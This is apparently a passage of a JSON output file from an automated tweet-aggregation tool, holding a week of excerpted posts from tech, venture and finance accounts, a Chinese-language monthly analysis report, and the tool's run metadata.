increase It is important for leaders in tech and AI to point out the benefits of AI to society and the world more aggressively\n[原文链接](https://x.com/eladgil/status/2046284194943500453)\n\n**[2026-04-20T17:45:44+00:00]**\n> R to @eladgil: 12/12 Most AI companies should consider exiting in the next 12-18 months\n[原文链接](https://x.com/eladgil/status/2046284191885922498)\n\n**[2026-04-20T17:45:43+00:00]**\n> R to @eladgil: 11/12 AI is about selling work, not software. Units of labor as the product This is a big shift in TAM, agents, how to build product in the AI era. Many AI markets are 10-100X the size…\n[原文链接](https://x.com/eladgil/status/2046284190132609299)\n\n**[2026-04-20T17:45:43+00:00]**\n> R to @eladgil: 10/12 Harness creating more and more stickiness to models If you look at the use of AI coding tools, the harness (and broader product surface area eg UX, workflow, etc) seems to be inc…\n[原文链接](https://x.com/eladgil/status/2046284188622737554)\n\n**[2026-04-20T17:45:42+00:00]**\n> R to @eladgil: 9/12 Artisanal engineers will be be increasingly unhappy inside companies. Deep artisanal “my code is my craft” and “I love creating bespoke things” engineers decreasingly happy in wor…\n[原文链接](https://x.com/eladgil/status/2046284184877187540)\n\n---\n\n### ✅ @DavidSacks — David Sacks(19 条)\n\n**[2026-04-26T20:42:24+00:00]**\n> MSM hoax factories like the Atlantic love to allege conflicts of interest without ever disclosing their own.\n[原文链接](https://x.com/DavidSacks/status/2048502978626113625)\n\n**[2026-04-26T17:37:26+00:00]**\n> RT by @DavidSacks: Accurate\n[原文链接](https://x.com/DavidSacks/status/2048456433981591867)\n\n**[2026-04-26T15:03:35+00:00]**\n> RT by @DavidSacks: Cole Allen, the gunman from last night’s WH Correspondents Dinner, maintained an active online presence, especially on the leftwing social media platform Bluesky where he went by t…\n[原文链接](https://x.com/DavidSacks/status/2048417712439689346)\n\n**[2026-04-25T18:47:09+00:00]**\n> RT by @DavidSacks: .@POTUS: \"We want to beat China at the industry. We're leading with crypto, we're leading with AI, and I really feel I have an obligation... as a President, I have to be able to ma…\n[原文链接](https://x.com/DavidSacks/status/2048111588930986354)\n\n**[2026-04-25T13:54:41+00:00]**\n> RT by @DavidSacks: Probably the best take I have heard on why there is so much fear around software exposure in private equity and credit because of AI From David Sacks \"Historically we only had two …\n[原文链接](https://x.com/DavidSacks/status/2048037985765949537)\n\n**[2026-04-25T03:16:09+00:00]**\n> RT by @DavidSacks: Incredible return on investment! 💰💰💰\n[原文链接](https://x.com/DavidSacks/status/2047877294476116184)\n\n**[2026-04-25T02:52:39+00:00]**\n> SPLC invested $270k in Charlottesville and got $81 million in additional donations. Extraordinary returns.\n[原文链接](https://x.com/DavidSacks/status/2047871382923469241)\n\n**[2026-04-25T02:37:36+00:00]**\n> Marc Benioff is the apex cloud founder. He and Salesforce have turned every previous technology wave to their advantage. Cloud, social, mobile, big data. I predict AI will be no different.\n[原文链接](https://x.com/DavidSacks/status/2047867592790946189)\n\n**[2026-04-25T00:55:54+00:00]**\n> RT by @DavidSacks: SACKS: “We're really lucky that [Trump] is President … when this AI revolution is happening.” JASON: “What would happen if Kamala ‘Ding Dong’ was in right now?” SACKS: “We'd have n…\n[原文链接](https://x.com/DavidSacks/status/2047842000632713369)\n\n**[2026-04-24T23:41:01+00:00]**\n> RT by @DavidSacks: David Sacks: We're lucky that Trump's the President when this AI revolution is happening. @Jason \"Do an alt history, Sacks, what would happen if Kamala Ding Dong was in right now?\"…\n[原文链接](https://x.com/DavidSacks/status/2047823154655932696)\n\n**[2026-04-24T22:41:49+00:00]**\n> RT by @DavidSacks: POD UP! Core four is back 🚨 Big show: -- SpaceX-Cursor deal, using compute as leverage -- SaaS debt bomb coming to PE?, venture debt risk -- Software bloodbath, buy low potential? …\n[原文链接](https://x.com/DavidSacks/status/2047808256047821141)\n\n**[2026-04-24T16:41:47+00:00]**\n> R to @DavidSacks: UPDATE: the DOJ has joined @xAI’s lawsuit against Colorado on First Amendment grounds. AI models should not be required to alter truthful output to comply with DEI.\n[原文链接](https://x.com/DavidSacks/status/2047717649849659586)\n\n**[2026-04-24T15:43:39+00:00]**\n> RT by @DavidSacks: David Sacks on Anthropic-Pentagon dispute, Musk-Altman feud and SpaceX-Cursor deal: https://cnb.cx/4d3HAKp\n[原文链接](https://x.com/DavidSacks/status/2047703023690924289)\n\n**[2026-04-24T15:10:25+00:00]**\n> RT by @DavidSacks: .@DavidSacks: \"We know that @AnthropicAI makes good products. They are smart people, there’s no question about it... we don’t care what their personal views are. What we care about…\n[原文链接](https://x.com/DavidSacks/status/2047694657107165519)\n\n**[2026-04-24T13:41:49+00:00]**\n> R to @DavidSacks: Full article: https://www.wsj.com/lifestyle/careers/are-college-graduates-finally-catching-a-break-in-this-job-market-38c37541?st=fxk6Dg&reflink=article_copyURL_share\n[原文链接](https://x.com/DavidSacks/status/2047672359377588241)\n\n**[2026-04-24T13:39:13+00:00]**\n> Narrative violation: Hiring of new college graduates is up 5.6% over last year. Youth unemployment for degreed 20–24‑year‑olds fell to 5.3% from 8.9%. Weren’t we told that 50% of entry-level jobs wer…\n[原文链接](https://x.com/DavidSacks/status/2047671706660073767)\n\n**[2026-04-23T00:04:16+00:00]**\n> R to @DavidSacks: Full article: https://www.foxnews.com/politics/anthropics-moral-compass-architect-suggested-ai-overcorrection-could-address-historical-injustices\n[原文链接](https://x.com/DavidSacks/status/2047104229773279572)\n\n**[2026-04-23T00:03:16+00:00]**\n> Reverse discrimination does not undo historical injustices but rather perpetrates new ones against a different set of individuals. This foments social strife and undermines the ideal of America as a …\n[原文链接](https://x.com/DavidSacks/status/2047103978979119580)\n\n**[2026-04-21T16:50:07+00:00]**\n> RT by @DavidSacks: This is insane… The Virginia redistricting amendment on the ballot today is framed as a vote to \"restore fairness in the upcoming elections.\" In reality, it turns a state that Kama…\n[原文链接](https://x.com/DavidSacks/status/2046632586735243420)\n\n---\n\n### ✅ @HarryStebbings — Harry Stebbings(19 条)\n\n**[2026-04-27T14:02:33+00:00]**\n> R to @HarryStebbings: Spotify https://open.spotify.com/episode/5KPihKzCMKY2DnPeuSxXZ5 Apple Podcasts https://podcasts.apple.com/us/podcast/20vc-applovin-%24160bn-market-cap-%245-48bn-revenue-%2410m/i…\n[原文链接](https://x.com/HarryStebbings/status/2048764743205134644)\n\n**[2026-04-27T14:02:33+00:00]**\n> Adam Foroughi is by far one of the best CEOs I have ever interviewed. Candidly he is insanely stern and cold but also obsessive, focused and utterly brilliant. With Adam there is zero fluff, like non…\n[原文链接](https://x.com/HarryStebbings/status/2048764741435179442)\n\n**[2026-04-27T13:30:16+00:00]**\n> Two areas I would love to invest that are non-technical: 1. Egg freezing clinics. In 10 years, strongly believe every 21 year old will freeze their eggs and it becomes the norm. Amazing business. Ins…\n[原文链接](https://x.com/HarryStebbings/status/2048756619622707452)\n\n**[2026-04-26T22:34:46+00:00]**\n> We hired someone for the investing team. Something I never planned to do. They sent the team 3 new deals per day for 90 days straight. All aligned to our stage, geography and deal type. That’s how yo…\n[原文链接](https://x.com/HarryStebbings/status/2048531257399664920)\n\n**[2026-04-26T19:35:39+00:00]**\n> I have interviewed 1,000 of the best CEOs of the last 10 years. Adam Foroughi, Founder @AppLovin is easily top 3, ever. $160BN Market Cap $5.48BN Revenue $10M EBITDA per head 82%+ margins Just 450 pe…\n[原文链接](https://x.com/HarryStebbings/status/2048486182904852537)\n\n**[2026-04-26T15:07:55+00:00]**\n> Seeing two types of founders emerge in this moment: The tourists and the terminators. The terminators are salivating at the opportunity ahead. Hungrier than ever. More ambitious than ever. They want …\n[原文链接](https://x.com/HarryStebbings/status/2048418806867870115)\n\n**[2026-04-26T13:56:31+00:00]**\n> The best founders I know all text their investors. None of them email them. The relationship will blossom and deepen in a matter of messages.\n[原文链接](https://x.com/HarryStebbings/status/2048400836024283246)\n\n**[2026-04-24T21:38:00+00:00]**\n> This week I got to sit down with two truly generational CEOs and ask them anything: @tobi @Shopify ($160BN Market Cap) Adam Foroughi @AppLovin ($160BN Market Cap) I have the best job in the world.\n[原文链接](https://x.com/HarryStebbings/status/2047792195868967172)\n\n**[2026-04-24T15:04:00+00:00]**\n> How Claude Design Will Hurt Figma \"Claude Design will not replace Figma directly, but it will chip away at it. It removes the need to wait for designers by letting people go straight from idea to pro…\n[原文链接](https://x.com/HarryStebbings/status/2047693043080261672)\n\n**[2026-04-23T23:43:00+00:00]**\n> Why the biggest fintech players are in for a shock. \"The shift is from human UX to agent UX. In the past, you won with dashboards, design and user experience. Now, the buyer is an AI agent, and it on…\n[原文链接](https://x.com/HarryStebbings/status/2047461264998478113)\n\n**[2026-04-23T21:23:00+00:00]**\n> I used to think MAUs and WAUs were the dumbest metric. Now I think it's the most important. \"I used to think MAUs and WAUs did not matter, now I think they are critical. In the AI era, usage is the l…\n[原文链接](https://x.com/HarryStebbings/status/2047426032840634830)\n\n**[2026-04-23T20:32:21+00:00]**\n> Slightly soppy bromance post but Jason believed in me when I was 18 and at law school still. There were next to no signs 20VC was or would be a success. He has been a dear friend ever since!\n[原文链接](https://x.com/HarryStebbings/status/2047413285675290984)\n\n**[2026-04-23T17:48:00+00:00]**\n> Does the $60BN Cursor Deal Make Sense: \"It actually makes sense when you look at what each side lacks. One has explosive revenue but weak margins due to compute and model costs. The other has massive…\n[原文链接](https://x.com/HarryStebbings/status/2047371926335857036)\n\n**[2026-04-23T16:53:42+00:00]**\n> It is a very expensive desire to be a value investor today. It is much easier to be a momentum investor, that is for sure.\n[原文链接](https://x.com/HarryStebbings/status/2047358263868436791)\n\n**[2026-04-23T14:06:50+00:00]**\n> R to @HarryStebbings: Spotify 👉 https://open.spotify.com/episode/6EjWkbt83H2WXhDMjjS7PF Youtube 👉 https://youtu.be/s61XVZAt5ns Apple Podcasts 👉 https://podcasts.apple.com/us/podcast/20vc-cursor-acqui…\n[原文链接](https://x.com/HarryStebbings/status/2047316269465006363)\n\n**[2026-04-23T14:06:50+00:00]**\n> This is the big f**king deal. Cursor acquired for $60BN by xAI I sat down with @jasonlk and @rodriscoll to discuss the deal, along with the biggest news in tech this week: - Anthropic Hits $1TRN in S…\n[原文链接](https://x.com/HarryStebbings/status/2047316267858645088)\n\n**[2026-04-22T13:07:07+00:00]**\n> I have interviewed 1,000 founders over 10 years. If I could only invest in five, this would be them: 1. Nik Storonsky (Revolut) 2. @alanchanguk (Fuse Energy) 3. Adam Foroughi (AppLovin) 4. @awxjack (…\n[原文链接](https://x.com/HarryStebbings/status/2046938853445959738)\n\n**[2026-04-21T20:17:56+00:00]**\n> I have interviewed 1,000 CEOs of the largest companies over the last 10 years. Adam Foroughi is top 5 I have ever met. Easily. AppLovin Market Cap: $160BN Revenue: $5.48BN EBITDA per Head: $10M There…\n[原文链接](https://x.com/HarryStebbings/status/2046684883494600911)\n\n**[2026-04-21T15:37:00+00:00]**\n> In a world of agents, how do software providers prevent themselves from becoming valueless databases? \"The value proposition has to be: 1. How good are your APIs? 2. How well designed are they 3. Are…\n[原文链接](https://x.com/HarryStebbings/status/2046614183513604299)\n\n---\n\n### ✅ @jason — Jason Calacanis(19 条)\n\n**[2026-04-27T16:13:00+00:00]**\n> Imagine when you can take these on Uber (or own one), what it will do to real estate values?!? 🤯 From hill country ranches to Austin in ten minutes?! If you could buy one for $2m, or lease for $5k a …\n[原文链接](https://x.com/jason/status/2048797572014207114)\n\n**[2026-04-27T16:10:40+00:00]**\n> 10 minutes from manhattan to jfk is a game changer… … but the 5 minutes from my loft in Chelsea to Breezy Point in 7 minutes during the 90s would have been insane! Imagine when you can take these on …\n[原文链接](https://x.com/jason/status/2048796982227972344)\n\n**[2026-04-27T15:56:20+00:00]**\n> RT by @Jason: update! the @twistartups AI sidebar is going well The goal: a live AI sidebar with 4 personas watching the pod in real time Progress update: ✅ Side bar (Chrome extension works with any …\n[原文链接](https://x.com/jason/status/2048793378511536538)\n\n**[2026-04-27T15:03:32+00:00]**\n> Best accounts for following Austin air quality? @grok\n[原文链接](https://x.com/jason/status/2048780089295302690)\n\n**[2026-04-27T01:51:02+00:00]**\n> Incredible writing from @euphoriaHBO\n[原文链接](https://x.com/jason/status/2048580651985604783)\n\n**[2026-04-26T19:42:30+00:00]**\n> I’ve invested in 700 private companies Providing liquidity and loans to high performing founders is completely standard. In fact, investors encourage loans and secondary sales for founders to enable …\n[原文链接](https://x.com/jason/status/2048487905543237675)\n\n**[2026-04-26T18:14:04+00:00]**\n> Ok @Acosta, balls in your court\n[原文链接](https://x.com/jason/status/2048465651723882972)\n\n**[2026-04-26T18:05:09+00:00]**\n> The NYTimes focus last week was micro-looting, social murder and meaningless private company transactions designed to ferment class warfare. Disgraziad\n[原文链接](https://x.com/jason/status/2048463405590225173)\n\n**[2026-04-26T17:13:01+00:00]**\n> Who made this?!\n[原文链接](https://x.com/jason/status/2048450286902235560)\n\n**[2026-04-26T16:21:34+00:00]**\n> I’m proud to announce I’m hosting an exhibition cage match between @Acosta and @mtracey on July 4th $100,000 cash prize Vegas 3, 3 minute rounds\n[原文链接](https://x.com/jason/status/2048437340218044499)\n\n**[2026-04-26T16:16:34+00:00]**\n> Once again, the substack party result in a Donnybrook — it’s like the source awards for wordmaxxers\n[原文链接](https://x.com/jason/status/2048436081725464959)\n\n**[2026-04-26T13:51:54+00:00]**\n> RT by @Jason: Random pic of @Jason protecting our $TAO bags\n[原文链接](https://x.com/jason/status/2048399674269213067)\n\n**[2026-04-26T03:57:07+00:00]**\n> The left has a serious violence problem, which @DavidSacks called out early and often. This generation of woke democratic socialists are morally bankrupt. They believe in looting and violence as a po…\n[原文链接](https://x.com/jason/status/2048249992163242220)\n\n**[2026-04-26T03:46:17+00:00]**\n> If you’re not condemning these lunatics, you’re advocating for the end of the American empire. I’m not for canceling people, but the fact the @nytimes and @newyorker not only employees these individu…\n[原文链接](https://x.com/jason/status/2048247267182658004)\n\n**[2026-04-26T03:40:08+00:00]**\n> Heroes 🫡\n[原文链接](https://x.com/jason/status/2048245718171648271)\n\n**[2026-04-25T21:25:29+00:00]**\n> x.com/i/spaces/1nGeLyjZrkvKX\n[原文链接](https://x.com/jason/status/2048151434928017429)\n\n**[2026-04-25T19:06:45+00:00]**\n> nightmare blunt rotation\n[原文链接](https://x.com/jason/status/2048116521436590260)\n\n**[2026-04-25T19:06:07+00:00]**\n> today #knicks @mikal_bridges to 6th man/leads the bench in scoring Knicks play @23savage____ 26 minutes, he has 5 offensive boards We're up 20+ points in the second half @ATLHawks backs broken; they …\n[原文链接](https://x.com/jason/status/2048116362766127514)\n\n**[2026-04-25T17:57:08+00:00]**\n> RT by @Jason: AngelList introduced USVC: venture investing for non-accredited investors starting at $500. Hear why Jason thinks the social media criticisms lack merit and says: \"More liquidity for in…\n[原文链接](https://x.com/jason/status/2048099001782985057)\n\n---\n\n### ✅ @charliebilello — Charlie Bilello(14 条)\n\n**[2026-04-27T16:21:01+00:00]**\n> Americans spent over $109 billion on lottery tickets last year, which is more than they spent on movies, books, concerts and sports tickets - combined.\n[原文链接](https://x.com/charliebilello/status/2048799590044852390)\n\n**[2026-04-27T13:50:42+00:00]**\n> 2026 is following the same playbook as 2025. Only difference is traders have become much more immune to extreme rhetoric and have been more confident in buying the dip, sending the stock market quick…\n[原文链接](https://x.com/charliebilello/status/2048761760971096534)\n\n**[2026-04-27T13:16:36+00:00]**\n> The S&P 500's CAPE Ratio has moved up to 41, its highest level since 2000 and now above 99% of historical valuations. $SPX Video: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=36s\n[原文链接](https://x.com/charliebilello/status/2048753179471323584)\n\n**[2026-04-27T13:08:19+00:00]**\n> With 28% of companies reported, S&P 500 1st quarter earnings are up 15% over the prior year, the 13th consecutive quarter of positive YoY growth. $SPX Video: https://www.youtube.com/watch?v=p5e0ThPjI…\n[原文链接](https://x.com/charliebilello/status/2048751094671585397)\n\n**[2026-04-27T12:53:00+00:00]**\n> RT by @charliebilello: Wondering which month is the best time to start investing? The right answer is any month. Just start!\n[原文链接](https://x.com/charliebilello/status/2048747238986305979)\n\n**[2026-04-26T16:18:48+00:00]**\n> RT by @charliebilello: Does a government shutdown negatively impact the stock market? No. The S&P 500 has gained an average of 0.4% during prior shutdowns and is up 4.8% during the current shutdown w…\n[原文链接](https://x.com/charliebilello/status/2048436641451155650)\n\n**[2026-04-26T15:10:21+00:00]**\n> RT by @charliebilello: The 12.5% gain in the S&P 500 over the last 4 weeks was the 20th biggest 4-week advance for the index since 1950. $SPX Video: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=646s\n[原文链接](https://x.com/charliebilello/status/2048419415222259820)\n\n**[2026-04-26T14:19:13+00:00]**\n> RT by @charliebilello: The stock market is at an all-time high. Credit spreads are near all-time lows. And inflation has been above the Fed's target level for 61 consecutive months, averaging 4% per …\n[原文链接](https://x.com/charliebilello/status/2048406550897729561)\n\n**[2026-04-26T14:00:02+00:00]**\n> RT by @charliebilello: On March 30, the S&P 500 was down 7% in 2026, the 12th worst start to a year in history. After one of the biggest 4-week rallies ever, it's now up +5% YTD and above the average…\n[原文链接](https://x.com/charliebilello/status/2048401720540061794)\n\n**[2026-04-26T13:45:00+00:00]**\n> RT by @charliebilello: Global Inflation Rates are on the RISE... Video: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=1433s\n[原文链接](https://x.com/charliebilello/status/2048397937156518387)\n\n**[2026-04-26T13:30:00+00:00]**\n> RT by @charliebilello: With the exception of Bitcoin, every major asset class is now in positive territory on the year... Video: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=973s\n[原文链接](https://x.com/charliebilello/status/2048394162366533935)\n\n**[2026-04-26T13:14:49+00:00]**\n> RT by @charliebilello: The S&P 500 ended the week at another all-time high, its 9th of the year. $SPX Video: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=646s\n[原文链接](https://x.com/charliebilello/status/2048390341221404827)\n\n**[2026-04-25T19:55:14+00:00]**\n> RT by @charliebilello: New video is up: 📈The Week in Charts - breaking down the most important charts and themes in markets... https://www.youtube.com/watch?v=p5e0ThPjIAg\n[原文链接](https://x.com/charliebilello/status/2048128721286992166)\n\n**[2026-04-25T13:31:00+00:00]**\n> RT by @charliebilello: \"No one has ever been a success betting against America since 1776 — and they're not going to be a success in the future doing it, either.\" – Warren Buffett\n[原文链接](https://x.com/charliebilello/status/2048032027513864212)\n\n---\n\n### ✅ @WarriorTrading — Warrior Trading(0 条)\n\n---\n\n### ✅ @CryptoCred — Credible Crypto(1 条)\n\n**[2026-04-22T22:25:51+00:00]**\n> Dev is posting about price\n[原文链接](https://x.com/CryptoCred/status/2047079463750377958)\n\n---\n\n### ✅ @AltcoinBuzz — AltcoinBuzz(0 条)\n\n---\n\n### ⚠️ @二级炒家 — 二级炒家(获取失败)\n\n- 错误: invalid_handle_for_nitter\n\n### ✅ @svwang1 — 王川(硅谷)(6 条)\n\n**[2026-04-25T01:59:39+00:00]**\n> 自 2021年创立到 2026年三月初累积收入 (不是利润)五十亿美元出头的 anthropic, 在二级市场的估值已经超过一万亿美元。 2025年经营现金流 459亿美元, 税后利润 669亿美元的 Berkshire, 市值也是一万亿美元。\n[原文链接](https://x.com/svwang1/status/2047858045057909226)\n\n**[2026-04-24T15:45:26+00:00]**\n> 投资巴菲特的 Berkshire Hathaway 不能让你暴富,但可以让已经富的人继续富下去。 投资 AI 公司,也许可以让你暴富,但更大的几率是全部亏光。\n[原文链接](https://x.com/svwang1/status/2047703469063377001)\n\n**[2026-04-24T00:27:47+00:00]**\n> R to @Svwang1: 历史读得少的后果,是视野比较狭隘,看得不够远,对于因果链条比较长的事物无法正确理解,因此选择了错误的解释和预测体系。这进一步导致在关键转折点时作出错误选择,在本可低成本提早布局的时刻过于迟钝。\n[原文链接](https://x.com/svwang1/status/2047472537488302502)\n\n**[2026-04-24T00:19:18+00:00]**\n> 多看历史的一个好处是可以给自己开各种上帝视角,枯燥无聊或者低谷期时可以拥有乐观的想象力,顺风顺水时仍然保持谨慎而不得意忘形。\n[原文链接](https://x.com/svwang1/status/2047470402725921150)\n\n**[2026-04-20T21:42:30+00:00]**\n> 很多事情抽象几层之后,就发现底层逻辑是一样的, 而且非常简单。同样的底层逻辑,就可以举一反三,产生组合性和复利。从表象之下抽象出本质,有时会非常费力,因为太多信息迷雾,或者利益相关者搅浑水。所以复利只能在自己有信息优势,看得清楚的地方产生。搅浑水的人有动机用完全错误的信息诱导一批人接受他的错误的逻辑,然后你发现这些错误的逻辑在别的地方不适用,但又不理解是为什么。\n[原文链接](https://x.com/svwang1/status/2046343776378257515)\n\n**[2026-04-20T21:13:36+00:00]**\n> 很多慈善机构最后异化成圈钱的工具,用类似的话术来货币化他人的善心。甚至它所有的流程都在表面上都非常合规,但和慈善的精神和最终目的没有太大关系了。所有以 KPI 管理的机构最终都会变成这样。\n[原文链接](https://x.com/svwang1/status/2046336504407142606)\n\n---\n\n### ✅ @liuliu — 刘进(3 条)\n\n**[2026-04-24T04:05:41+00:00]**\n> I've been thinking about local LLMs a lot these days.\n[原文链接](https://x.com/liuliu/status/2047527371486658814)\n\n**[2026-04-23T17:57:10+00:00]**\n> I still think on usability-wise, there is a big gap between \"your thing in the training data\" v.s. \"your thing in the SKILL.md\". Prove me wrong otherwise.\n[原文链接](https://x.com/liuliu/status/2047374234004115719)\n\n**[2026-04-22T16:16:24+00:00]**\n> Ask Codex about Ulysses attention: wow, you know so much and can help me get this communication+spda thing work! Ask Codex to implement a segmented file downloader: didn’t even get the completion blo…\n[原文链接](https://x.com/liuliu/status/2046986486629986435)\n\n---\n", + "monthly_analysis_md": "# X平台资讯深度分析报告\n\n**报告日期**: 2026-04-27T17:07:38.921884+00:00\n**分析账号**: 27个 | **活跃账号**: 21个 | **推文总量**: 259条\n\n---\n\n## 一、总体概览\n\n- 本报告基于 X 关注列表近30天 RSS 数据自动生成。\n- 默认口径:按账号聚合、按推文主题词粗分层。\n\n## 二、主题分布\n\n- **其他**:170 条\n- **模型能力**:53 条\n- **交易与市场**:15 条\n- **投融资与并购**:13 条\n- **算力与芯片**:8 条\n\n## 三、活跃账号 Top10\n\n- @GaryMarcus: 20 条\n- @sama: 20 条\n- @paulg: 20 条\n- @pmarca: 20 条\n- @eladgil: 20 条\n- @elonmusk: 19 条\n- @jason: 19 条\n- @HarryStebbings: 19 条\n- @DavidSacks: 19 条\n- @ylecun: 19 条\n\n## 四、代表性推文\n\n- @elonmusk | 2026-04-27T16:54:21+00:00\n - Calling him “Scam” Altman is accurate. This is very much worth reading.\n - https://x.com/elonmusk/status/2048807976991850953\n- @elonmusk | 2026-04-27T16:39:59+00:00\n - RT by @elonmusk: Sam Altman cannot be trusted. • The OpenAI board fired him because he was not always honest with them. They said he should not control powerful AI. • A major repo…\n - https://x.com/elonmusk/status/2048804363595059425\n- @elonmusk | 2026-04-27T16:31:33+00:00\n - Exactly\n - https://x.com/elonmusk/status/2048802239272169582\n- @elonmusk | 2026-04-27T16:30:27+00:00\n - Pinned: Scam Altman and Greg Stockman stole a charity. Full stop. Greg got tens of billions of stock for himself and Scam got dozens of OpenAI side deals with a piece of the actio…\n - https://x.com/elonmusk/status/2048801964457140540\n- @elonmusk | 2026-04-27T16:21:30+00:00\n - Scam Altman\n - https://x.com/elonmusk/status/2048799712375902624\n- @charliebilello | 2026-04-27T16:21:01+00:00\n - Americans spent over $109 billion on lottery tickets last year, which is more than they spent on movies, books, concerts and sports tickets - combined.\n - https://x.com/charliebilello/status/2048799590044852390\n- @jason | 2026-04-27T16:13:00+00:00\n - Imagine when you can take these on Uber (or own one), what it will do to real estate values?!? 🤯 From hill country ranches to Austin in ten minutes?! If you could buy one for $2m,…\n - https://x.com/jason/status/2048797572014207114\n- @jason | 2026-04-27T16:10:40+00:00\n - 10 minutes from manhattan to jfk is a game changer… … but the 5 minutes from my loft in Chelsea to Breezy Point in 7 minutes during the 90s would have been insane! Imagine when yo…\n - https://x.com/jason/status/2048796982227972344\n- @AndrewYNg | 2026-04-27T15:58:13+00:00\n - AI-native software engineering teams operate very differently than traditional teams. The obvious difference is that AI-native teams use coding agents to build products much faste…\n - https://x.com/AndrewYNg/status/2048793852702757151\n- @elonmusk | 2026-04-27T15:56:52+00:00\n - RT by @elonmusk: From space to your phone, Starlink Mobile is now available to deliver data, voice, video, and messaging to @docomo customers in Japan 🛰️❤️📱\n - https://x.com/elonmusk/status/2048793511701717143\n- @jason | 2026-04-27T15:56:20+00:00\n - RT by @Jason: update! the @twistartups AI sidebar is going well The goal: a live AI sidebar with 4 personas watching the pod in real time Progress update: ✅ Side bar (Chrome exten…\n - https://x.com/jason/status/2048793378511536538\n- @GaryMarcus | 2026-04-27T15:50:31+00:00\n - If a major car company had AI fan boys and released a car with loose lug nuts and the wheels came off, after hyping it as the greatest thing ever, and a bunch of people died, thos…\n - https://x.com/GaryMarcus/status/2048791912149295182\n- @GaryMarcus | 2026-04-27T15:33:34+00:00\n - R to @GaryMarcus: that said, another tweet by the same user does correctly assess what’s wrong with most user’s model of what LLMs say.\n - https://x.com/GaryMarcus/status/2048787646206677207\n- @GaryMarcus | 2026-04-27T15:31:37+00:00\n - This is totally wrong. Blaming the user is missing the point that (a) coding agents have been overhyped and (b) can’t reliably obey the rules given to them in system prompts and o…\n - https://x.com/GaryMarcus/status/2048787157536653627\n- @elonmusk | 2026-04-27T15:26:33+00:00\n - RT by @elonmusk: .@shaunmmaguire says Elon Musk’s X acquisition was in service of civilizational-scale missions. \"I truly believe, like in my soul, that he is trying to help human…\n - https://x.com/elonmusk/status/2048785882950549854\n- @elonmusk | 2026-04-27T15:15:09+00:00\n - If extremely violent criminals are not imprisoned, eventually they will murder innocent people\n - https://x.com/elonmusk/status/2048783014075777369\n- @jason | 2026-04-27T15:03:32+00:00\n - Best accounts for following Austin air quality? @grok\n - https://x.com/jason/status/2048780089295302690\n- @elonmusk | 2026-04-27T14:53:45+00:00\n - Excellent point\n - https://x.com/elonmusk/status/2048777628019032335\n- @GaryMarcus | 2026-04-27T14:27:36+00:00\n - yep, that’s what I do. I am increasingly concerned that people in China are soaking up my wisdom, while a lot of people in the US try to dismiss me. i don’t think that is going to…\n - https://x.com/GaryMarcus/status/2048771044987777428\n- @HarryStebbings | 2026-04-27T14:02:33+00:00\n - R to @HarryStebbings: Spotify https://open.spotify.com/episode/5KPihKzCMKY2DnPeuSxXZ5 Apple Podcasts https://podcasts.apple.com/us/podcast/20vc-applovin-%24160bn-market-cap-%245-4…\n - https://x.com/HarryStebbings/status/2048764743205134644\n\n---\n\n*本报告由系统自动生成,供月度复盘使用。*\n", + "paths": { + "tweet_summary_md": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/Claude_input/x资讯/推文汇总_202604.md", + "monthly_analysis_md": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/Claude_input/x资讯/月度深度分析_202604.md" + } +} \ No newline at end of file diff --git a/data/x_brief/history/20260427_171658.json b/data/x_brief/history/20260427_171658.json new file mode 100644 index 0000000..a4001a9 --- /dev/null +++ b/data/x_brief/history/20260427_171658.json @@ -0,0 +1,3035 @@ +{ + "generated_at": "2026-04-27T17:15:13.448908+00:00", + "report_type": "weekly", + "input": { + "watchlist_path": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/Claude_input/x资讯/简报配置.md", + "watchers": [ + { + "handle": "karpathy", + "name": "Andrej Karpathy" + }, + { + "handle": "sama", + "name": "Sam Altman" + }, + { + "handle": "DarioAmodei", + "name": "Dario Amodei" + }, + { + "handle": "AravSrinivas", + "name": "Aravind Srinivas" + }, + { + "handle": "AndrewYNg", + "name": "Andrew Ng" + }, + { + "handle": "ylecun", + "name": "Yann LeCun" + }, + { + "handle": "JeffDean", + "name": "Jeff Dean" + }, + { + "handle": "soumithchintala", + "name": "Soumith Chintala" + }, + { + "handle": "gregbrockman", + "name": "Greg Brockman" + }, + { + "handle": "GaryMarcus", + "name": "Gary Marcus" + }, + { + "handle": "elonmusk", + "name": "Elon Musk" + }, + { + "handle": "paulg", + "name": "Paul Graham" + }, + { + "handle": "naval", + "name": "Naval Ravikant" + }, + { + "handle": "pmarca", + "name": "Marc Andreessen" + }, + { + "handle": "david_tiantian", + "name": "David Tian Wang" + }, + { + "handle": "morganhousel", + "name": "Morgan Housel" + }, + { + "handle": "eladgil", + "name": "Elad Gil" + }, + { + "handle": "DavidSacks", + "name": "David Sacks" + }, + { + "handle": "HarryStebbings", + "name": "Harry Stebbings" + }, + { + "handle": "jason", + "name": "Jason Calacanis" + }, + { + "handle": "charliebilello", + "name": "Charlie Bilello" + }, + { + "handle": "WarriorTrading", + "name": "Warrior Trading" + }, + { + "handle": "CryptoCred", + "name": "Credible Crypto" + }, + { + "handle": "AltcoinBuzz", + "name": "AltcoinBuzz" + }, + { + "handle": "二级炒家", + "name": "二级炒家" + }, + { + "handle": "svwang1", + "name": "王川(硅谷)" + }, + { + "handle": "liuliu", + "name": "刘进" + } + ], + "days": 7, + "per_account_limit": 80 + }, + "output": { + "description": "关注博主近一周推文", + "tweet_window_days": 7, + "tweet_count": 259 + }, + "period": { + "days": 7, + "start_utc": "2026-04-20T17:14:40.877383+00:00", + "end_utc": "2026-04-27T17:15:13.448908+00:00", + "month_tag": "202604" + }, + "overview": { + "total_accounts": 27, + "active_accounts": 21, + "total_tweets": 259, + "failed_accounts": 0, + "source_hits": { + "nitter": 26 + }, + "source_errors": {} + }, + "accounts": [ + { + "handle": "karpathy", + "account": "@karpathy", + "name": "Andrej Karpathy", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 1, + "error": "", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + 